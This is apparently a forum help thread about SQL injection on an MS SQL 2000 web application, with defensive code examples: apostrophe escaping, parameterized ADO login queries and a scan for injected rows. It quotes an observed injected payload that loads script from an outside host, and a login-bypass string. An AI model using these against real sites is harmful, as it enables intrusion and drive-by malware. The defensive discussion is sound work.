SQL Injection

I am having a problem with my database: somehow someone is altering the data in my database. I talked to the IT staff and they say it might be an SQL injection. It alters all the records in one table, adding some junk code, like:

so if the value before was 'aleks', after the injection it is 'aleks<script src=http://www.bnrupdate.mobi/b.js></script>'

Have you seen this before? Sometimes it's code from Google Analytics, etc. It is driving me crazy, not to mention a security risk. How can I track down when and who is doing this, and how do I prevent this from happening again?

This is a web application with limited users; everything (web forms, etc.) is behind a username/password protected area. Nothing is open to the public. I am using MS SQL 2000.

Any pointers are appreciated; this is a big concern for me at this moment, and I am willing to pretty much try everything that could help. But if there is a way to get the person doing this, I am willing to set up a 'trap' to get his IP or whatever.

Aleks
AleksAsked:
sureshchsahuCommented:
The article below gives you a clear picture of how to prevent SQL injection:

http://www.codeproject.com/KB/database/SqlInjectionAttacks.aspx
0
 
AleksAuthor Commented:
Ok, so if we talk about not allowing certain characters to be input into the system, the apostrophe ' would be at the top of the list, because the queries that are run require such a character. Correct?
Any other character that would be a big no-no?
0
 
madunixCommented:
FYI, SQL injection is the top-rated web application attack these days. There is a lot of insecure code over the net, and there are also several ways to protect an ASP.NET application from SQL injection attacks. SQL injection can occur when an application uses input to construct dynamic SQL statements or when it uses stored procedures to connect to the database. Methods of SQL injection exploitation are classified according to the DBMS type and the exploitation conditions: the vulnerable request can implement INSERT, UPDATE or DELETE; it is possible to inject SQL code into any part of an SQL request; blind SQL injection; and features of the SQL implementations used in various DBMSs. Successful SQL injection attacks enable attackers to execute commands in an application's database and also take over the server. Check Google for more on how to protect against SQL injection.
Regarding the Microsoft issue, check http://msdn.microsoft.com/en-us/library/ms998271.aspx
Search http://www.sans.org/ for "sql injection"
WASC: http://projects.webappsec.org/SQL-Injection
OWASP: http://www.owasp.org/index.php/SQL_Injection

madunix

0
 
R_HarrisonCommented:
Also check out the article below (shameless self-promotion); however, XSS is now far more popular than SQL injection, and the attack you have received uses SQL injection to perform an XSS-type attack.

http://www.experts-exchange.com/articles/Internet/Web_Development/Preventing-Cross-Site-Scripting-XSS-1.html?sfQueryTermInfo=1+30+xss
0
 
sybeCommented:
> nothing is open to the public

You mean there is not even a "public" part, viewable to non-logged-in users? If so, it looks like you have an easily hacked login form.

Preventing SQL injection is simple: make sure that all apostrophes in an SQL statement are escaped before sending them to the database.

<%
' Double every apostrophe in the user input so it stays inside the SQL string literal
safeInput = Replace(userinput, "'", "''")
%>

Hacking a login form when there is no check for SQL Injection is easy by inserting something like "x' OR 'a' = 'a" (without the double quotes) into the password field.

It results in an SQL statement as

SELECT * FROM <users> WHERE <name>='loginname' AND password='x' OR 'a' = 'a'

Because 'a' = 'a' is True for all records, this query will return all users.

0
 
Anthony PerkinsCommented:
>>nothing is open to the public. I am using MS SQL 2000. <<
So MS SQL Server is behind a good firewall?

0
 
AleksAuthor Commented:
So, for them to do this, do they need to type ' (quotes) in the password field?

If I don't allow such character in ANY field in my entire system, would this prevent future injections ?
0
 
sybeCommented:
Not allowing the apostrophe has some disadvantages, because it is a character that has its uses.
Better to escape the apostrophe than to disallow it (in terms of code that makes no difference).
0
 
AleksAuthor Commented:
What do you mean by 'escape'?
0
 
R_HarrisonCommented:
Basically, replace a single apostrophe with two apostrophes...

e.g. replace(username, "'", "''")

so your sql line might look something like...

SELECT * FROM mytable WHERE Username='" & replace(request("Username"), "'", "''") & "'
0
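The escaping that sybe and R_Harrison describe above, worked through as an added example in classic ASP (JScript, the dialect of the author's own page). This is not code from either commenter; the helper names SqlQuote and SqlInt and the sample inputs are constructed for the example. It shows the login-bypass string from sybe's comment being kept inside the string literal, and the caveat kevp75 raises later in the thread: escaping only protects quoted values, so an unquoted numeric comparison needs a type check instead.

```asp
<%
// Added example (not from the thread): apostrophe escaping in classic ASP JScript.
// SqlQuote doubles every apostrophe and wraps the value in quotes, so whatever the
// user typed stays inside one SQL string literal.
function SqlQuote(value) {
  // Request.Form returns a collection object; coerce to a JScript string first.
  return "'" + String(value).replace(/'/g, "''") + "'";
}

// Constructed inputs: a legitimate name with an apostrophe, and the bypass string
// quoted in sybe's comment above.
var normalName = "O'Brian";
var bypass     = "x' OR 'a' = 'a";

var sqlNormal = "SELECT * FROM dbo.users WHERE name = " + SqlQuote(normalName);
// -> SELECT * FROM dbo.users WHERE name = 'O''Brian'
//    SQL Server reads '' as one literal apostrophe, so Mr. O'Brian can still log in.

var sqlBypass = "SELECT * FROM dbo.users WHERE password = " + SqlQuote(bypass);
// -> SELECT * FROM dbo.users WHERE password = 'x'' OR ''a'' = ''a'
//    The OR never leaves the literal; it is compared as part of the password text
//    and matches no row.

// Caveat: escaping protects only values placed between quotes. A numeric column
// compared without quotes (WHERE id = 7) cannot be protected by doubling
// apostrophes, because no apostrophe is needed to change the statement. Force the
// type instead: accept digits only, and refuse anything else.
function SqlInt(value) {
  var s = String(value);
  if (!/^\d{1,9}$/.test(s)) throw new Error("expected a small positive integer, got: " + s);
  return s;
}

var idInput = "42";   // constructed; in the real page this would come from Request.Form("id")
var sqlId = "SELECT * FROM dbo.users WHERE id = " + SqlInt(idInput);
// -> SELECT * FROM dbo.users WHERE id = 42
// SqlInt("42 OR 1=1") throws instead of building a statement.

Response.Write(Server.HTMLEncode(sqlNormal) + "<br>");
Response.Write(Server.HTMLEncode(sqlBypass) + "<br>");
Response.Write(Server.HTMLEncode(sqlId) + "<br>");
%>
```

The two helpers cover the two contexts a dynamic query can place a value in: a quoted string (escape) and an unquoted number (validate and reject). Any other context, such as a column name or ORDER BY clause, should not take user input at all; use a whitelist lookup in the page instead.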
 
AleksAuthor Commented:
Ok, let me get this straight.
1. I am being attacked by someone entering code in the fields where, for example, a username or password should be?
2. If I don't allow the apostrophe, or replace it, in either field, they should no longer be able to enter the code to attack me. Correct?
0
 
sybeCommented:
1. It is not certain how you are being attacked, but it is possible that it happens this way.
2. SQL injection can be prevented in a number of ways. The most used are parameterized queries, stored procedures or escaping (indeed, replacing every single apostrophe in user input with two apostrophes). Disallowing apostrophes as user input is not a widely used method.
0
 
Daniel WilsonCommented:
>> Disallowing apostrophes as user input is not a widely used method.

Right.  Mr. O'Brian strongly disapproves of such an approach :)

I highly encourage parameterized queries.  Others like escaping ... and some say to do both.
0
 
AleksAuthor Commented:
This is the query for my login page, which is the only form outside of the password protected area.

<%
var EmployeeLogin__usxusername = "%";
if (String(Request.Form("txtusername")) != "undefined" && 
    String(Request.Form("txtusername")) != "") {
  EmployeeLogin__usxusername = String(Request.Form("txtusername"));
}
%>
<%
var EmployeeLogin__usxpassword = "%";
if (String(Request.Form("txtpassword")) != "undefined" && 
    String(Request.Form("txtpassword")) != "") {
  EmployeeLogin__usxpassword = String(Request.Form("txtpassword"));
}
%>
<%
var EmployeeLogin = Server.CreateObject("ADODB.Recordset");
EmployeeLogin.ActiveConnection = MM_AAA_STRING;
EmployeeLogin.Source = "select * from dbo.vulogdtls   WHERE Loginid = '"+ EmployeeLogin__usxusername.replace(/'/g, "''") + "' AND Password = '"+ EmployeeLogin__usxpassword.replace(/'/g, "''") + "'  AND Enable = 1 AND (ExpDate >= getdate() OR ExpDate IS NULL)";
EmployeeLogin.CursorType = 0;
EmployeeLogin.CursorLocation = 2;
EmployeeLogin.LockType = 1;
EmployeeLogin.Open();
var EmployeeLogin_numRows = 0;
%>

Would that query have any problem and be potentially unsafe? Or is it OK?

I can't seem to find anything that is causing data to be input into my database; this is really becoming a very stressful experience.
Are there any specific recommendations that anyone can make? I know reading articles helps, but it won't be something that will immediately and possibly stop the attacks. For example: "Change your IP" would be a good recommendation.
I heard that from someone, do you think this would help ?
Are there other specific recommendations you could offer to help prevent attacks ?

How about if it's not from the outside but a file or script already on the server; is this a possibility? Or content in the database that resides there and adds the data; is this another possibility?

A
0
 
AleksAuthor Commented:
Also, is there a possibility this is not an SQL injection and instead some malicious script already residing on the server? If this is the case, what would be the best course of action?
Or is there a chance the script is inside the database?
0
 
madunixCommented:
My recommendation:
- Basically, make sure your web server is up to date with the latest security fixes/patches.
- Make sure you filter every user input and output with proper encoding like UTF-8.
Read the full testing guide: https://www.owasp.org/images/8/89/OWASP_Testing_Guide_V3.pdf
- Try to implement a web application scanner; check this link: http://trac.ush.it/ush/wiki/SecurityTools
- I use, e.g., the Watchfire (now IBM AppScan) tools http://www-01.ibm.com/software/rational/offerings/websecurity/ to scan all my web applications.
0
 
AleksAuthor Commented:
Thank you, this is very useful. I will look into these tools.

Aleks
0
 
AleksAuthor Commented:
I am sorry it's taken so long for me to respond, but I have been busy learning and implementing the SQL fixes.
The thing is, last night I stopped my website in IIS: no web access. I cleaned up my database squeaky clean ... midnight ... went to sleep. Woke up and checked my database .. all injected, same code all over different tables (same tables) and mostly in 'text' fields.
So .. how could someone inject information into my database while the website is down? My understanding is that they do it through the web pages by entering code and submitting the form to run it; if there is no form, how in the world did my database get this code?

I checked for viruses and adware/malware ... nothing on the server. It is SQL 2000 with Service Pack 4 and all patched up to the neck .. don't know what else to do.

My DB person told me to run Profiler on the SQL server so we can see what happens overnight. Any other ideas? It would sound like a worm that is in the database, but then again I know nothing about these things; I am losing my faith, and my whole business depends on this database :(
0
 
AleksAuthor Commented:
BTW, I already changed all server passwords, database passwords and ODBC passwords, and I assigned a new IP and a new domain name ... and still got the code inserted into my database, all while the website that connects to the database was down.
0
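Since the rows keep changing while IIS is stopped, the author's two comments above need a way to see exactly which tables and columns are being written to, before and after each cleanup and alongside the Profiler trace the DB person suggested. Here is an added example of such a check as a one-off admin page in classic ASP (JScript); it is not code from the thread. It assumes MM_AAA_STRING is the connection string used in the author's login code, and searches for the "<script" marker seen in the injected values; the SQL Server 2000 INFORMATION_SCHEMA views are used to enumerate the character columns.

```asp
<%
// Added example (not from the thread): list every character column that currently
// contains the injected marker, with a row count per column.
var marker = "<script";   // the fragment common to the injected values in the question

var adCmdText    = 1;     // ADO constants, written out because adovbs.inc is not always included
var adVarChar    = 200;
var adParamInput = 1;

var conn = Server.CreateObject("ADODB.Connection");
conn.Open(MM_AAA_STRING);

// Enumerate the columns that can hold text. SQL Server 2000 exposes this through
// INFORMATION_SCHEMA.COLUMNS; LIKE works on text/ntext as well as (n)(var)char.
var cols = conn.Execute(
  "SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS " +
  "WHERE DATA_TYPE IN ('char','varchar','nchar','nvarchar','text','ntext')");

// Identifiers come from the catalog, not from the user, but they are still quoted
// with brackets (a ']' inside a name is doubled) so odd table names cannot break the query.
function Bracket(name) {
  return "[" + String(name).replace(/]/g, "]]") + "]";
}

// The marker itself is bound as a parameter, so this page does not concatenate data
// into SQL text. The same Command object is reused for every column.
var cmd = Server.CreateObject("ADODB.Command");
cmd.ActiveConnection = conn;
cmd.CommandType = adCmdText;
cmd.Parameters.Append(cmd.CreateParameter("@m", adVarChar, adParamInput, 255, "%" + marker + "%"));

var affected = 0;
while (!cols.EOF) {
  var table  = Bracket(cols("TABLE_SCHEMA").Value) + "." + Bracket(cols("TABLE_NAME").Value);
  var column = Bracket(cols("COLUMN_NAME").Value);
  cmd.CommandText = "SELECT COUNT(*) AS hits FROM " + table + " WHERE " + column + " LIKE ?";
  var rs = cmd.Execute();
  var hits = rs("hits").Value;
  rs.Close();
  if (hits > 0) {
    affected++;
    Response.Write(Server.HTMLEncode(table + "." + column + ": " + hits + " row(s)") + "<br>");
  }
  cols.MoveNext();
}
cols.Close();
conn.Close();
Response.Write("Columns containing the marker: " + affected);
%>
```

Run it once after a cleanup (expect zero affected columns) and again after the overnight window; the columns that reappear are the ones to watch in the Profiler trace, which will show the login name, host and application name of whatever session issues the UPDATE. Keep this page inside the protected area or run it only from the server itself.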
 
kevp75Commented:
Better still would be to use parameterized queries with the ADO Command object.

Force all the data types before they get to your query.

Also, start cleaning your input... I suggest some regular expressions to validate everything.
0
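The parameterized approach that sybe, Daniel Wilson and kevp75 recommend above, applied to the author's own login query as an added example in classic ASP (JScript). This is not code from any commenter: the table dbo.vulogdtls, its columns and the MM_AAA_STRING connection string are taken from the code the author posted; the GetField helper, the login-id pattern and the 50-character limits are assumptions for the example. It combines all three of kevp75's points: placeholders instead of concatenation, a fixed parameter type and length, and a regular expression that rejects bad input before it reaches the database.

```asp
<%
// Added example (not from the thread): the author's login lookup rewritten to use a
// parameterized ADODB.Command. The values never become part of the SQL text, so an
// apostrophe in the input is just a character in the comparison.
var adCmdText    = 1;     // CommandType: plain SQL text
var adVarChar    = 200;   // parameter data type
var adParamInput = 1;     // parameter direction

// Read a form field as a plain string; a missing field becomes "" rather than "undefined".
function GetField(name) {
  var v = String(Request.Form(name));
  return (v === "undefined") ? "" : v;
}

var username = GetField("txtusername");
var password = GetField("txtpassword");

// Validate before querying. Assumed rule: a login id is 1-50 characters drawn from
// letters, digits and a few punctuation marks; anything else is refused here, and an
// empty field is refused instead of being replaced with the original code's "%" default.
var loginIdPattern = /^[A-Za-z0-9._@-]{1,50}$/;
if (!loginIdPattern.test(username) || password.length === 0 || password.length > 50) {
  Response.Write("Invalid login");
  Response.End();
}

var cmd = Server.CreateObject("ADODB.Command");
cmd.ActiveConnection = MM_AAA_STRING;   // ADO opens an implicit connection from the string
cmd.CommandType = adCmdText;
// Each ? is bound positionally to the parameters appended below.
cmd.CommandText = "SELECT Loginid FROM dbo.vulogdtls WHERE Loginid = ? AND Password = ? " +
                  "AND Enable = 1 AND (ExpDate >= getdate() OR ExpDate IS NULL)";
cmd.Parameters.Append(cmd.CreateParameter("@Loginid",  adVarChar, adParamInput, 50, username));
cmd.Parameters.Append(cmd.CreateParameter("@Password", adVarChar, adParamInput, 50, password));

var rs = cmd.Execute();
var loggedIn = !rs.EOF;   // exactly one matching, enabled, unexpired account means success
rs.Close();

if (loggedIn) {
  Session("Loginid") = username;
} else {
  Response.Write("Invalid login");
}
%>
```

Because the driver sends the parameter values separately from the statement, the bypass string "x' OR 'a' = 'a" is compared as a 14-character password and matches nothing; no Replace call is needed, and the regular expression stays only as a sanity check on the shape of the input. The same CreateParameter pattern applies to every other form on the site, which is the point the commenters make about forcing data types: an integer column gets an adInteger parameter (constant 3), and a non-numeric value is rejected by ADO before the statement runs.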
 
Anthony PerkinsCommented:
>>better still would be to use parameterized queries <<
Very good advice.  :)
0